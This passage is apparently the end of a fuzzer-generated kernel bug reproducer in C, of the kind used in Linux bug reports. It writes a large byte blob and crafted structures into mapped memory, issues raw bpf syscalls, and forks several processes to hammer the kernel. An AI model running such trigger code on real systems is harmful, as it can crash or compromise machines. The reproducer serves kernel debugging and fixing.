2e\xb0\xef\xa8\x71\x3f\xab\xca\xb1\x0b\x92\x2e\x7a\xe9\xba\x2d\x1c\xf7\x0d\x89\x9e\x82\x94\xae\xc2\x0b\x78\xd4\x48\x90\x0d\x24\x3d\x0e\x5e\x2b\x68\x9c\xe2\xe1\x01\x6e\x5d\xc8\xff\x4d\xf7\xcc\x3b\xda\x06\x57\x8a\x41\xab\xd5\x6d\xc5\x64\x75\xa8\xc2\x9f\x2f\xe5\xf8\x8b\x8e\x69\x29\xaf\xdc\x46\x79\x0e\x0c\x39\xb0\x42\xaa\xaa\x05\xb9\x08\xb6\x0b\xed\x67\x30\x80\x87\x61\x88\x8e\xac\xc3\xc3\x7f\x01\x57\xf0\xce\xd8\xaf\x66\x22\x4f\xee\xa5\xed\xb9\x00\xa7\x7c\xe1\xd8\x7f\x2b\x3b\x1f\x73\xaa\x30\xf7\x9d\xfc\xe6\x2d\x11\x5a\x60\x8b\x7a\xc9\x4d\x73\xf5\xc4\x00\xa2\xba\xc9\xe9\xb0\x3c\xb2\xd9\x33\x0e\xe9\x41\x9a\x01\xe2\xf4\xeb\x91\xa1\x36\xb7\xc0\xdc\xfc\x67\x2b\x3b\x50\x10\xe5\x46\xfc\x1e\xa5\x45\xa8\x10\x9e\x21\x0c\x19\xa8\xfc\x82\xb9\x1a\x3c\x5a\xf9\x0a\x5c\x28\xc9\x1f\xe5\x30\xc0\x3a\xe0\xaf\x91\x55\x82\x75\x32\x96\xb5\xf0\x87\xc0\xf3\x96\xfd\xfd\xf1\xe0\x12\x8a\xa0\x79\x23\x5c\x2f\x48\x8e\xdc\x39\x3b\x98\xee\x79\x3d\xed\xfa\x03\x72\xa7\xc2\x37\x03\xad\xe1\x7e\x7b\xa8\xcd\xde\x28\xe7\x67\xe7\x5a\x36\x26\x3c\x5f\xe2\xba\x99\x36\xa5\xbe\xeb\xec\x32\x2c\xa3\xa0\xb8\xea\xaf\x8e\xf2\xc8\x32\xd8\x30\x41\xb0\x9b\x57\x44\xc8\xe2\x1f\x86\xa7\xe7\xbe\x2d\xc6\xc2\xc3\x9c\x71\x2a\xdb\x52\x91\xbd\xcc\xda\x32\xd1\x26\x9a\xb5\x03\xce\xbd\x53\x8f\xdc\x61\xac\x90\xaa\x06\xa9\x09\x6e\x2b\xad\xf9\xac\xe1\x4d\x5e\x8c\xb9\x99\xfb\xfe\x23\x8b\xcd\xb7\x6a\x76\xd3\x39\xab\x49\x06\x2a\xef\x40\x76\xf8\xe1\xdf\x03\x8e\x6b\x57\xff\xd2\x07\x69\xde\x49\x21\x99\x63\x7e\x64\xaa\xf9\xa5\xe4\xab\x9d\x9b\x3f\x95\x60\x76\x3d\x2a\xd6\x49\x52\xfd\xc3\x40\x48\xd6\xa9\x2a\x75\x3d\xc2\xe7\xee\xef\xf5\x1d\x1c\x11\x34\xe7\xc1\x4b\x80\xcd\xe2\xdf\xd1\xf1\x1a\x77\xcd\x98\xa7\x84\x27\x25\xdb\xc2\xb1\x80\x8e\x6a\x11\xf9\x45\xda\x39\xbc\xe0\xf8\x50\x25\x12\x0e\xd7\x81\xfd\x70\xe5\x26\x23\xdb\x9f\xfa\x89\x60\xdf\x56\xa2\xbd\x4a\xcf\x1d\x72\x71\xd9\x71\x12\x31\xc4\xb6\x3a\xc7\xfc\x2f\xea\x1c\x9a\xce\x11\x3c\xdf\x1d\xb9\x92\x88\x3d\x14\x77\xb6\x6a\x95\x72\x14\x62\x03\x13\x2e\x69\x63\x35\x1e\x90\x4b\xd4\x7f\x77\x03\x0c\xda\xf0\xe7\xc6\xf9\x81\xa7\x23\x5a\xfd\xf4\x1c\xb7\xf2\x32\x6b\xe9\x95\x6f\xd1\x1f\x37\x44\x65\x35\xd7\x16\x69\x30\x4b\xf8\x87\x36\x2f\x3a\x24\xff\x9c\xf7\x0b\x36\xa8\x2e\x79\x94\xb0\x0f\x61\x2f\xc8\x35\x8d\xb6\xe4\xcd\x03\x31\x36\xe7\xfc\xb1\xb5\x3b\x73\xd6\x06\x0c\xf2\x55\x5e\x5a\xe1\xa6\x27\x5f\x13\x3c\x0f\x7d\x50\xc1\x65\x49\xac\xea\xa8\x68\x78\xfe\xd5\xeb\x21\x73\xbb\xf8\x82\x59\x88\x19\xcf\xbb\xe4\x37\xa2\x10\xc4\xf4\xf6\xfc\x68\x5a\x1f\x45\x79\x57\x13\xb8\x35\x82\x6f\xf0\xe1\x9b\x0c\x20\x85\x78\xe1\x9d\x54\x9b\x17\xa0\x54\x9a\x6d\xab\x0e\x71\xcf\x37\xb4\x42\xd7\x06\x38\x22\x77\x61\xe4\x9b\xf2\xd6\x97\x49\xca\xfe\x1b\x4f\x2e\x33\x6b\x20\x13\x2f\xad\x52\x64\x9e\xe0\xbc\x41\x19\xdf\x4c\xd9\xea\xf6\x91\xbb\x17\x6b\x29\x84\x06\x49\xea\x2f\xd2\x2b\x94\xcb\x68\x8b\x7b\xd2\x42\x7a\xcd\x3c\xc2\x4a\x8c\xbb\x14\xa5\x14\x65\xc8\x4f\xd6\x1f\x4b\x49\x72\xca\x45\xe7\x42\x60\x87\xd3\x83\x96\xca\xfa\x59\x91\xe5\x84\xa1\x09\xcf\xc1\x9c\x68\xd9\x56\x90\x76\x97\x64\x1b\x85\x32\xa3\x1e\x5b\x4c\x51\x27\xc4\xb4\x69\x43\xc8\x80\xfd\xa3\x9d\x14\x11\x5d\x4f\xc6\xc0\xc6\x03\x94\x5b\x73\x6a\x38\x15\x41\xf8\xac\x40\x7d\xc6\xc8\x9f\xa5\x05\xbb\xd8\xfe\x4c\x14\xe5\x18\x29\xeb\x5c\x92\x3d\x70\x92\x00\xe0\x88\x15\x7c\xb8\xc2\x16\xde\xcb\x79\x81\x11\x2a\xa2\xeb\x99\xb6\x3a\x88\x47\x0d\x5f\x21\xa8\x48\x17\x56\x5e\xf0\x60\x61\x7e\x75\xd9\xea\xf1\xd3\x61\x50\x43\xfa\xec\x58\xd0\x01\xa4\xde\x2b\x0d\xf5\xbb\x8a\x25\x1d\xa0\x8e\x30\x14\xd1\x03\x9f\x9f\x3a\x34\xce\xdb\x0d\xf2\x9e\x41\x45\x75\x4c\xfb\x5f\x85\xf0\x8d\xbf\x53\xe7\xbe\x2e\x40\x8a\x61\xf6\x14\xaf\x57\x80\x18\xa2\xf5\x98\xc9\x5a\x3a\xe7\x48\x3c\x7d\x0e\x7e\x77\x6a\x32\x12\x66\x48\xde\xdf\x98\x69\xed\xb7\x11\x94\x59\xc7\xfe\xd8\x0d\x75\x45\xf9\x7f\xa1\xb8\xf5\xac\x14\xfb\x10\x81\xca\xac\xcc\xc8\xa9\x50\x88\x29\xad\x73\xac\x90\xb3\x85\x85\x33\xfd\xbc\xab\x58\xe1\x21\x65\xe6\x4d\x78\x9a\x2a\x2a\x67\xd2\xd1\x6a\xc5\xf3\xdb\xde\x4b\xa0\x6c\x44\x32\xa0\xc0\x42\xaf\xa4\x5e\xaf\x4c\x5d\x75\x1f\xbb\x1c\x42\xab\x83\xa9\x5e\x7c\xae\x0b\x07\xbd\x40\x80\xd4\x79\xbf\x26\xe0\xf5\x84\x29\x24\xd7\x5d\x58\x76\x35\x0c\x9f\xa9\x71\xb6\x03\xd1\x79\x4c\x9f\x77\x1a\xc3\x57\xea\x0f\x9d\xe3\xef\x4a\x1a\x2f\xbf\x11\xec\x16\xa2\x32\xf4\x68\xa8\xfa\x67\x1b\x87\xdf\x78\x50\x28\x7f\xfc\xa7\x78\x23\xce\x69\x86\x56\xf1\x9a\xfd\x8d\x56\xf4\xaa\x59\xfc\x0f\x73\x32\x17\x86\xd4\x52\xbe\xe9\x33\x13\x99\x68\xb6\x63\x4f\x20\xcf\xfa\x5b\x6f\x62\x34\xd7\xb2\x7b\x8b\x7c\x81\xac\x35\xfd\xed\xdc\xf7\xcb\xc4\x49\x17\x3d\x7b\x94\x7c\x2a\xfe\x98\xfa\xe2\xff\x28\x26\x73\xbb\x8d\x71\xae\x68\x58\x37\x38\x77\xb5\xa3\x64\x19\xd4\x94\x28\xce\x7b\x69\x75\xe8\xf3\x6b\xbb\x98\xbb\x39\xe7\x97\xce\x90\x70\x52\x96\x83\xca\x93\x24\x84\x4a\xd8\xdc\x95\x7a\x10\x75\x5b\x1f\x42\x8a\x01\xd4\xd5\xc4\x14\xb9\x8d\xa7\xf2\x1c\xa8\xe6\x3d\x79\x77\xdd\x06\xb1\xa6\x40\x86\x73\x1a\xe4\xa0\x14\x73\xee\x2f\x6d\x84\x2a\x51\x85\x91\x03\x6b\xb9\x15\x7d\x1f\xaa\xdb\x06\xaf\xf8\xfe\xdd\x47\xb5\xf2\x2d\xc7\xd1\x03\x01\xf2\x6d\xfd\x13\x0b\xc7\xbb\x6d\xe9\x0b\x19\x8d\x49\x89\x59\x12\x3b\x7b\xe7\xe3\x97\x48\xe7\xc7\xd5\x11\x31\xf8\x68\xf5\x53\x65\x0d\xa9\x9e\xf8\x8d\xb0\x19\x2b\x1a\xed\xed\xd2\x39\x18\xa0\xe2\x22\x0f\x63\x75\xfe\xc2\x54\xea\x32\x4d\x77\xc9\x2e\x77\xff\xed\x00", 4096);
*(uint64_t*)0x20000190 = 0x20001a00;
*(uint64_t*)0x20000198 = 4;
syscall(__NR_bpf, 1ul, 0x20000180ul, 0x20ul);
break;
case 3:
*(uint64_t*)0x200001c0 = 0;
*(uint64_t*)0x200001c8 = 0;
*(uint64_t*)0x200001d0 = 0x200000c0;
*(uint64_t*)0x200001d8 = 0x20000240;
*(uint32_t*)0x200001e0 = -1;
*(uint32_t*)0x200001e4 = r[0];
*(uint64_t*)0x200001e8 = 0;
*(uint64_t*)0x200001f0 = 0;
syscall(__NR_bpf, 0x1aul, 0x200001c0ul, 0x38ul);
break;
case 4:
*(uint64_t*)0x20000680 = 0;
*(uint64_t*)0x20000688 = 0;
*(uint64_t*)0x20000690 = 0x20000340;
*(uint64_t*)0x20000698 = 0x200005c0;
*(uint32_t*)0x200006a0 = 0xffff;
*(uint32_t*)0x200006a4 = r[0];
*(uint64_t*)0x200006a8 = 0;
*(uint64_t*)0x200006b0 = 0;
syscall(__NR_bpf, 0x19ul, 0x20000680ul, 0x38ul);
break;
}
}
int main(void)
{
syscall(__NR_mmap, 0x1ffff000ul, 0x1000ul, 0ul, 0x32ul, -1, 0ul);
syscall(__NR_mmap, 0x20000000ul, 0x1000000ul, 7ul, 0x32ul, -1, 0ul);
syscall(__NR_mmap, 0x21000000ul, 0x1000ul, 0ul, 0x32ul, -1, 0ul);
for (procid = 0; procid < 5; procid++) {
if (fork() == 0) {
loop();
}
}
sleep(1000000);
return 0;
}